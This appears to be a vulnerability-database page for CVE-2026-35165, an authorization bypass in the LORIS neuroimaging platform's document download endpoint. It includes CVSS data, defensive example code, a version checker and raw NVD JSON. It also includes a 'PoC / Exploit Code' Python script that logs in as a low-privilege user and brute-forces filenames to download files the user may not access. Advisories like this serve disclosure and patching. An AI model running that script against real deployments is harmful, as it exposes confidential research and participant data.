Security Vulnerability Report
CVE-2026-35165 CVSS 6.3 MEDIUM

CVE-2026-35165

Published: 2026-04-08 19:25:23
Last Modified: 2026-04-21 20:18:27

Description

LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 21.0.0 to before 27.0.3, and in 28.0.0 (before 28.0.1), the document_repository frontend restricted which files a user could see, but the backend download endpoint did not correctly verify access permissions. An authenticated user could therefore download a file they should not have access to if they know, or can brute force, the filename. This vulnerability is fixed in 27.0.3 and 28.0.1.

The practical point is that the UI filtering is not a security control: the access decision has to be made again on the server, at the endpoint that actually serves the bytes, using the file's own permission metadata rather than whatever name the client supplied (NVD classifies this as CWE-639, Authorization Bypass Through User-Controlled Key). Exploitation requires a valid account and a guessable filename, which is why the CNA rated the impact Low across the board while NVD's own analysis rates confidentiality impact High. Affected deployments should upgrade to 27.0.3 or 28.0.1; until then, assume every file in the document repository is readable by any authenticated user.
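As an added illustration (not LORIS code, and not taken from the advisory), the following Python model contrasts the pre-fix pattern with a hardened handler. The repository contents, the per-document `allowed` set and the user model are constructed for the example; LORIS's real data model is not shown on this page. The hardened handler makes two changes the description implies a fix needs: it re-checks authorization on the download path itself, and it returns the same response for "no such file" and "not allowed", so a brute-force loop cannot tell which filenames exist.

```python
# Added example, not LORIS project code: a minimal model of a
# document_repository download endpoint before and after the fix.
import os
from dataclasses import dataclass, field


@dataclass
class User:
    name: str
    logged_in: bool = True


@dataclass
class Document:
    filename: str
    content: bytes
    # Hypothetical per-document ACL: usernames permitted to read the file.
    allowed: set = field(default_factory=set)


# Constructed sample repository (not real LORIS data).
REPO = {
    "public_protocol.pdf": Document(
        "public_protocol.pdf", b"%PDF-1.4 protocol", {"alice", "bob"}
    ),
    "site_b_participants.csv": Document(
        "site_b_participants.csv", b"id,dob\n1,1990-01-01\n", {"bob"}
    ),
}


def download_vulnerable(user: User, filename: str):
    """Pre-27.0.3 pattern: the frontend hides files the user may not see,
    but the endpoint only checks that a session exists before serving
    whatever filename the client asked for."""
    if not user.logged_in:
        return 401, None
    doc = REPO.get(filename)
    if doc is None:
        return 404, None
    return 200, doc.content


def download_fixed(user: User, filename: str):
    """Hardened handler: the permission check is repeated server-side, and
    unknown and forbidden files produce an identical answer so the endpoint
    is not an oracle for filename brute-forcing."""
    if not user.logged_in:
        return 401, None
    # Defensive: accept only a bare filename (no directory components).
    if filename != os.path.basename(filename) or filename in ("", ".", ".."):
        return 404, None
    doc = REPO.get(filename)
    if doc is None or user.name not in doc.allowed:
        return 404, None
    return 200, doc.content


if __name__ == "__main__":
    alice = User("alice")
    print("vulnerable:", download_vulnerable(alice, "site_b_participants.csv")[0])
    print("fixed:     ", download_fixed(alice, "site_b_participants.csv")[0])
```

With the constructed data, `alice` (who is not in the CSV's `allowed` set) gets the site file from the vulnerable handler and a 404 from the fixed one; `bob` gets it from both.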

CVSS Details

CVSS Score
6.3 (Secondary, CNA-supplied); NVD's Primary analysis scores it 6.5
Severity
MEDIUM (both assessments)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L (Secondary)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N (Primary)
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:* - VULNERABLE
21.0.0 up to and including 27.0.2 (all versions before 27.0.3)
28.0.0 (before 28.0.1)
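To check an installed instance against the affected ranges, here is an added example (not from NVD or LORIS) that evaluates the two `cpeMatch` entries reproduced in the Raw JSON section. It handles the generic NVD bounds (`versionStartIncluding`, `versionStartExcluding`, `versionEndIncluding`, `versionEndExcluding`) as well as an exact version embedded in the CPE string, so it works for other NVD configurations with the same shape; the `CPE_MATCHES` list below is copied from this page.

```python
# Added example: evaluate NVD cpeMatch entries against a version string.
# Not NVD or LORIS code; the match list is copied from this page's JSON.
import re

CPE_MATCHES = [
    {
        "vulnerable": True,
        "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*",
        "versionStartIncluding": "21.0.0",
        "versionEndIncluding": "27.0.2",
    },
    {
        "vulnerable": True,
        "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*",
    },
]

FIXED_VERSIONS = ("27.0.3", "28.0.1")


def parse_version(v: str) -> tuple:
    """'27.0.10' -> (27, 0, 10). Compared as tuples, so 27.0.10 > 27.0.2,
    which a plain string comparison would get wrong. A non-numeric
    component such as 'rc1' counts as 0 (pre-release handling is out of scope)."""
    parts = []
    for p in v.split("."):
        m = re.match(r"\d+", p)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def cpe_version(criteria: str) -> str:
    """The version field is the 6th colon-separated component of a CPE 2.3 string."""
    return criteria.split(":")[5]


def match_entry(entry: dict, version: str) -> bool:
    """True if `version` falls inside this cpeMatch entry."""
    if not entry.get("vulnerable", True):
        return False
    v = parse_version(version)
    exact = cpe_version(entry["criteria"])
    if exact != "*":
        return v == parse_version(exact)
    lo_inc = entry.get("versionStartIncluding")
    lo_exc = entry.get("versionStartExcluding")
    hi_inc = entry.get("versionEndIncluding")
    hi_exc = entry.get("versionEndExcluding")
    if lo_inc and v < parse_version(lo_inc):
        return False
    if lo_exc and v <= parse_version(lo_exc):
        return False
    if hi_inc and v > parse_version(hi_inc):
        return False
    if hi_exc and v >= parse_version(hi_exc):
        return False
    return True


def is_affected(version: str, matches=CPE_MATCHES) -> bool:
    """Nodes on this page use operator OR: any matching entry means affected."""
    return any(match_entry(m, version) for m in matches)


if __name__ == "__main__":
    for ver in ("26.0.0", "27.0.2", "27.0.3", "27.0.10", "28.0.0", "28.0.1"):
        print(ver, "affected" if is_affected(ver) else "not affected")
```

The fixed releases named in the description are deliberately not matched: 27.0.3 lies past `versionEndIncluding` 27.0.2, and 28.0.1 is not the exact 28.0.0 entry.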

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Configuration. The endpoint path, login URL and form field names below are
# placeholders: the advisory does not name them, so confirm each against the
# target instance before running this.
target_url = "https://example.com/document_repository/download"
login_url = "https://example.com/login"
username = "low_priv_user"
password = "password"

# Common filenames to brute force (examples)
wordlist = ["patient_data.csv", "config.php", "admin_notes.pdf", "results_2026.docx"]


def exploit():
    session = requests.Session()

    # Step 1: Authenticate as a low-privilege user
    login_data = {"username": username, "password": password}
    login_response = session.post(login_url, data=login_data)
    if login_response.status_code >= 400:
        print(f"[-] Login request failed with HTTP {login_response.status_code}")
        return
    print(f"[*] Logged in as {username}")

    # Step 2: Brute force filenames
    for filename in wordlist:
        # Parameter name may vary (e.g., 'file', 'filename', 'id')
        params = {"file": filename}
        response = session.get(target_url, params=params)

        # Check if download was successful (HTTP 200 and a file attachment header)
        if response.status_code == 200 and "Content-Disposition" in response.headers:
            print(f"[+] SUCCESS! Downloaded: {filename}")
            # Save file
            with open(f"downloaded_{filename}", "wb") as f:
                f.write(response.content)
        else:
            print(f"[-] Failed to access: {filename}")


if __name__ == "__main__":
    exploit()
```

References

https://github.com/aces/Loris/security/advisories/GHSA-qp6x-qfx7-54wp (Patch, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35165",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-08T19:25:23.300",
    "lastModified": "2026-04-21T20:18:26.640",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 21.0.0 to before 27.0.3 and 28.0.1, while the document_repository frontend was restricting file access, the backend endpoint was not correctly verifying access permissions. A user could theoretically download a file that they should not have access to, if they know or can brute force the filename. This vulnerability is fixed in 27.0.3 and 28.0.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mcgill:loris:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "21.0.0",
                "versionEndIncluding": "27.0.2",
                "matchCriteriaId": "752BF9F7-1E9D-4E71-AAC8-43F3E1533399"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mcgill:loris:28.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "D358B66A-04AC-44F2-8EF6-4332D8AC00F4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/aces/Loris/security/advisories/GHSA-qp6x-qfx7-54wp",
        "source": "[email protected]",
        "tags": [
          "Patch",
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```